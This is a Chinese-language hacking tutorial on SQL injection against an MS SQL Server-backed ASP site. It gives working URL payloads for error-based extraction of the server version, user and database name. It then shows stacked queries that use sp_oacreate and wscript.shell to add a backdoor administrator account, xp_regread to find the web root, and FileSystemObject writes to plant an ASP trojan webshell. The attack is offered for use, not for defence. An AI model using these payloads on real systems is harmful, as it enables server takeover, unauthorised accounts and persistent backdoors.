榨干MS SQL Server 最后一滴血

　　以下（使用一知名网站作为测试点），相信大家对sql爆库，爆表，爆字段都已掌握，在这里就不多说这方面了。

　　ms sql内置函数介绍：

　　@@version 获得windows的版本号，ms sql的版本号，补丁。 user_name() 得到当前系统的连接用户 db_name() 得到当前连接的数据库 host_name() 得到当前主机的名称

　　这些信息有助我们对系统进行简单的了解

　　好，下面我们就开始吧！

　　语句：

http：//www.xxx.com/list.asp?classid=1'

　　返回信息：

microsoft ole db provider for sql server 错误 '80040e14' 字符串 ' order by id desc' 之前有未闭合的引号。 /list.asp，行290 

　　从这里未闭合的引号（“’”），我们可以确定存在sql injection。发现在漏洞当然接着走了，利用以上介绍的函数为我们工作了：

　　语句：

http：//www.xxx.com/list.asp?classid=1 and 0<>(select @@version)

　　返回：

microsoft ole db provider for sql server 错误 '80040e07' 将 nvarchar 值 'microsoft sql server 2000 - 8.00.760 (intel x86) dec 17 2002 14：22：05 copyright (c) 1988-2003 microsoft corporation standard edition on windows nt 5.0 (build 2195： service pack 4) ' 转换为数据类型为 int 的列时发生语法错误。 /list.asp，行290 

　　相关的信息出来了，ms server advanced server 2000+sp4, sql 2000+sp3，从ms sql server 后面的8.00.760可看出是sp3补丁。看了服务器的信息，接下应该了解数据库的权限了：

　　语句：

http：//www.xxx.com/list.asp?classid=1 and user_name()=’dbo’

　　返回： 正常返回的信息

　　确定是权限是dbo，从表面dbo权限的连接用户经常是涉及sysadmin服务器角色成员。说明数据库服务器角色成员组默认是在每个数据库增加一个dbo用户。

　　返回原理根1=1，1=2相似..这里只是权限测试，我们也把它爆出来看看：

　　语句：

http：//www.xxx.com/list.asp?classid=1 and 0<>(select user_name())

　　返回：

microsoft ole db provider for sql server 错误 '80040e07' 将 nvarchar 值 'dbo' 转换为数据类型为 int 的列时发生语法错误。 /list.asp，行290 

　　说明连接数据库的用户权限很高，可以确定是服务器角色组中的成员。

　　语句：http：//www.xxx.com/list.asp?classid=1 and 0<>(select db_name())—返回：microsoft ole db provider for sql server 错误 '80040e07' 将 nvarchar 值 'gameimgsys' 转换为数据类型为 int 的列时发生语法错误。 /list.asp，行290

　　这样就可以爆出当前的数据库。得到这么高权限的数据库连接成员，我们当然想直接得到webshell，或是直接拿到nt admin。nt admin取决于当前服务器的配置，如果配置不合理的服务器，我们要直接拿nt admin，拿nt admin就要用到：

　　mssql内置存储过程：

　　sp_oacreate (通过它，危害很得更大，但是需要有sysadmins权限才可能使用) sp_oageterrorinfo sp_oagetproperty sp_oamethod sp_oasetproperty sp_setpropertysp_oastop

　　由于ms sql一次可以执行多语句，使得我们有机会使用更多的语句。

　　语句：

http：//www.xxx.com/list.asp?classid=1; declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null, 'c：/winnt/system32/cmd.exe /c net user cntest chinatest /add'

　　正常返回。（提示：如果主机上shell存在的话那将在服务器上创建一个cntest的用户）

　　创建用户了，语句后再加个net localgroup administrators cntest /add加到管理组中。 如果对方的机子开着3389端口，或ipc的话，那接下来的事，就不用我多说了。

　　遇到专业型主机，只开一个80端口，那应该怎么办呢？当然，我们还是可能拿到webshell，再慢慢渗透的。

　　由于权限高，我们可能先建表，写入asp木马的数据再通过makewebtask,得到websehll.手工写入的程序太过于繁锁，上传webshell最大的问题还是网页目录，现在网上已经有现成的工具通过backup，和maskwebtask的工具得到webshell了。以下推荐，获取网页路径（通过存储过程达到对注册表的读取）：

　　利用内置存储过程 xp_regread(读取注册表键值，权限public)：

　　语句：

http：//www.xxx.com/list.asp?classid=1;create table newtable(id int identity(1,1),paths varchar(500)) declare @test varchar(20) exec master..xp_regread @rootkey='hkey_local_machine', @key='system/currentcontrolset/services/w3svc/parameters/virtual roots/', @value_name='/', [email protected] output insert into paths(path) values(@test) 

　　iis的默认路径的在注册表中hkey_local_machine/ system/currentcontrolset/services/w3svc/parameters/virtual roots/

　　利用爆字段将数据库的值读出来：

　　语句：

http：//www.xxx.com/list.asp?classid=1 and 0<>(select top 1 paths from newtable)

　　返回：

microsoft ole db provider for odbc drivers 错误 '80040e07' [microsoft][odbc sql server driver][sql server]将 varchar 值 'e：/www,,201' 转换为数据类型为 int 的列时发生语法错误。 

　　这说明网页目录在e：/www，接下来也可以利用fso直接写入asp木马（提示必须拥用sysadmin权限才可使用fso和fso开入的前提下） ：

　　语句：

http：//www.xxx.com/list.asp?class=1;
declare%[email protected]%20int,%[email protected]%20int,%[email protected]%20int,%[email protected]%20int%20exec%20sp_oacreate%20'scripting.filesystemobject',
%[email protected]%20out%20exec%20sp_oamethod%[email protected],%20'createtextfile',%[email protected]%20out,%20'e：/www/test.asp',
1%20exec%[email protected]%20=%20sp_oamethod%[email protected],%20'writeline',%20null,%20'on error resume next'

　　在e：/www下创建一个test.asp并写入on error resume next语句：

http：//www.xxx.com/list.asp?classid=1;
declare%[email protected]%20int,%[email protected]%20int,%[email protected]%20int,%[email protected]%20int%20exec%20sp_oacreate%20'scripting.filesystemobject',
%[email protected]%20out%20exec%20sp_oamethod%[email protected],%20'opentextfile',
%[email protected]%20out,%20'e：/www/test.asp',8%20exec%[email protected]%20=%20sp_oamethod%[email protected],%20'writeline',%20null,%20'asp horse '

　　在e：/www/test.asp增加一行记录，记录为asp horse， 整个完整木马可能这样写入。(%百分号要用%25替代写入)。如果得不到网页目录，怎么办呢？前提你要猜到网站是否使用默认web，或者使用域名作为web。

declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null,’ cscript.exe c：/inetpub/wwwroot/mkwebdir.vbs -w "默认 web 站点" -v "e","e：/"’ 

　　在默认的web站点下创建一个虚拟目录e，指向e：盘下。

declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null,’ cscript.exe c：/inetpub/wwwroot/chaccess.vbs -a w3svc/1/root/e +browse’

　　给虚拟目录e加上浏览属性不错吧。给自己开虚拟服务。想那些网页目录路径，头都快破了。这下给自己一个天开眼了。那传webshell利用ms sql为我们的工作告了一段落了，接下来工作应该由你来了。